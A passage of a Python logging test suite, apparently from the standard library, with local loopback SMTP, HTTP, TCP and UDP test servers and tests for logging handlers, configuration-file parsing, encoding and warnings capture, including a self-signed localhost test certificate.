self.assertEqual('', sio.getvalue())
finally:
logging.raiseExceptions = old_raise
sys.stderr = old_stderr
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
if threading:
class TestSMTPChannel(smtpd.SMTPChannel):
"""
This derived class has had to be created because smtpd does not
support use of custom channel maps, although they are allowed by
asyncore's design. Issue #11959 has been raised to address this,
and if resolved satisfactorily, some of this code can be removed.
"""
def __init__(self, server, conn, addr, sockmap):
asynchat.async_chat.__init__(self, conn, sockmap)
self.smtp_server = server
self.conn = conn
self.addr = addr
self.data_size_limit = None
self.received_lines = []
self.smtp_state = self.COMMAND
self.seen_greeting = ''
self.mailfrom = None
self.rcpttos = []
self.received_data = ''
self.fqdn = socket.getfqdn()
self.num_bytes = 0
try:
self.peer = conn.getpeername()
except socket.error as err:
# a race condition may occur if the other end is closing
# before we can get the peername
self.close()
if err.args[0] != errno.ENOTCONN:
raise
return
self.push('220 %s %s' % (self.fqdn, smtpd.__version__))
self.set_terminator(b'\r\n')
self.extended_smtp = False
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
channel_class = TestSMTPChannel
def __init__(self, addr, handler, poll_interval, sockmap):
self._localaddr = addr
self._remoteaddr = None
self.data_size_limit = None
self.sockmap = sockmap
asyncore.dispatcher.__init__(self, map=sockmap)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(0)
self.set_socket(sock, map=sockmap)
# try to re-use a server port if possible
self.set_reuse_addr()
self.bind(addr)
self.port = sock.getsockname()[1]
self.listen(5)
except:
self.close()
raise
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def handle_accepted(self, conn, addr):
"""
Redefined only because the base class does not pass in a
map, forcing use of a global in :mod:`asyncore`.
"""
channel = self.channel_class(self, conn, addr, self.sockmap)
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
try:
asyncore.loop(poll_interval, map=self.sockmap)
except select.error:
# On FreeBSD 8, closing the server repeatably
# raises this error. We swallow it if the
# server has been closed.
if self.connected or self.accepting:
raise
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
self._thread.join(timeout)
self._thread = None
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
self._thread.join(timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except socket.error as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except socket.error:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
# - end of server_helper section
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPHandlerTest(BaseTest):
TIMEOUT = 8.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer(('localhost', 0), self.process_message, 0.001,
sockmap)
server.start()
addr = ('localhost', server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT) # 14314: don't wait forever
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_logger_disabling(self):
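        # fileConfig() disables any pre-existing logger that the new
        # configuration does not mention, unless it is called with
        # disable_existing_loggers=False.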
self.apply_config(self.disable_test)
logger = logging.getLogger('foo')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
addr = ('localhost', 0)
self.server = server = TestTCPServer(addr, self.handle_socket,
0.01)
server.start()
server.ready.wait()
self.sock_hdlr = logging.handlers.SocketHandler('localhost',
server.port)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
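        # SocketHandler frames each record as a 4-byte big-endian length prefix
        # followed by a pickled dict of the LogRecord's attributes, which is
        # exactly what this loop reassembles.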
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
# Kill the server
self.server.stop(2.0)
#The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertTrue(self.sock_hdlr.retryTime > now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
@unittest.skipUnless(threading, 'Threading required for this test.')
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
addr = ('localhost', 0)
self.server = server = TestUDPServer(addr, self.handle_datagram, 0.01)
server.start()
server.ready.wait()
self.sock_hdlr = logging.handlers.DatagramHandler('localhost',
server.port)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
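        # DatagramHandler reuses SocketHandler's pickle payload, including the
        # 4-byte length prefix, so strip that prefix before unpickling.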
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(threading, 'Threading required for this test.')
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
addr = ('localhost', 0)
self.server = server = TestUDPServer(addr, self.handle_datagram,
0.01)
server.start()
server.ready.wait()
self.sl_hdlr = logging.handlers.SysLogHandler(('localhost',
server.port))
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
# The log message sent to the SysLogHandler is properly received.
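        # '<11>' is the syslog priority: facility LOG_USER (1) * 8 + severity
        # LOG_ERR (3). The trailing NUL byte comes from append_nul, which is
        # True by default; 'ident', when set, is prepended to the message.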
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(threading, 'Threading required for this test.')
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
PEMFILE = """-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDGT4xS5r91rbLJQK2nUDenBhBG6qFk+bVOjuAGC/LSHlAoBnvG
zQG3agOG+e7c5z2XT8m2ktORLqG3E4mYmbxgyhDrzP6ei2Anc+pszmnxPoK3Puh5
aXV+XKt0bU0C1m2+ACmGGJ0t3P408art82nOxBw8ZHgIg9Dtp6xIUCyOqwIDAQAB
AoGBAJFTnFboaKh5eUrIzjmNrKsG44jEyy+vWvHN/FgSC4l103HxhmWiuL5Lv3f7
0tMp1tX7D6xvHwIG9VWvyKb/Cq9rJsDibmDVIOslnOWeQhG+XwJyitR0pq/KlJIB
5LjORcBw795oKWOAi6RcOb1ON59tysEFYhAGQO9k6VL621gRAkEA/Gb+YXULLpbs
piXN3q4zcHzeaVANo69tUZ6TjaQqMeTxE4tOYM0G0ZoSeHEdaP59AOZGKXXNGSQy
2z/MddcYGQJBAMkjLSYIpOLJY11ja8OwwswFG2hEzHe0cS9bzo++R/jc1bHA5R0Y
i6vA5iPi+wopPFvpytdBol7UuEBe5xZrxWMCQQCWxELRHiP2yWpEeLJ3gGDzoXMN
PydWjhRju7Bx3AzkTtf+D6lawz1+eGTuEss5i0JKBkMEwvwnN2s1ce+EuF4JAkBb
E96h1lAzkVW5OAfYOPY8RCPA90ZO/hoyg7PpSxR0ECuDrgERR8gXIeYUYfejBkEa
rab4CfRoVJKKM28Yq/xZAkBvuq670JRCwOgfUTdww7WpdOQBYPkzQccsKNCslQW8
/DyW6y06oQusSENUvynT6dr3LJxt/NgZPhZX2+k1eYDV
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIICGzCCAYSgAwIBAgIJAIq84a2Q/OvlMA0GCSqGSIb3DQEBBQUAMBQxEjAQBgNV
BAMTCWxvY2FsaG9zdDAeFw0xMTA1MjExMDIzMzNaFw03NTAzMjEwMzU1MTdaMBQx
EjAQBgNVBAMTCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA
xk+MUua/da2yyUCtp1A3pwYQRuqhZPm1To7gBgvy0h5QKAZ7xs0Bt2oDhvnu3Oc9
l0/JtpLTkS6htxOJmJm8YMoQ68z+notgJ3PqbM5p8T6Ctz7oeWl1flyrdG1NAtZt
vgAphhidLdz+NPGq7fNpzsQcPGR4CIPQ7aesSFAsjqsCAwEAAaN1MHMwHQYDVR0O
BBYEFLWaUPO6N7efGiuoS9i3DVYcUwn0MEQGA1UdIwQ9MDuAFLWaUPO6N7efGiuo
S9i3DVYcUwn0oRikFjAUMRIwEAYDVQQDEwlsb2NhbGhvc3SCCQCKvOGtkPzr5TAM
BgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBAMK5whPjLNQK1Ivvk88oqJqq
4f889OwikGP0eUhOBhbFlsZs+jq5YZC2UzHz+evzKBlgAP1u4lP/cB85CnjvWqM+
1c/lywFHQ6HOdDeQ1L72tSYMrNOG4XNmLn0h7rx6GoTU7dcFRfseahBCq8mv0IDt
IRbTpvlHWPjsSvHz0ZOH
-----END CERTIFICATE-----"""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
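        # HTTPHandler sends the record's attribute dict as URL-encoded form
        # data: in the query string for GET and in the request body for POST,
        # which is why both methods are checked below.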
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
fd, fn = tempfile.mkstemp()
os.close(fd)
with open(fn, 'w') as f:
f.write(self.PEMFILE)
sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslctx.load_cert_chain(fn)
os.unlink(fn)
except ImportError:
sslctx = None
else:
sslctx = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client)
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
    def _assert_survival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
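        # The Manager keeps every logger in its logger dictionary, so dropping
        # our only visible reference below must not let it be garbage collected.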
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
        self._assert_survival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
        # Non-ASCII data written through a FileHandler with an explicit
        # encoding should round-trip intact.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
